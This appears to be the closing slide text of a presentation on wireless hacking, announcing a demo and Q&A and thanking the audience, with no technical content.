DEMO - Q&A WIRELESS HACKING

THANK YOU!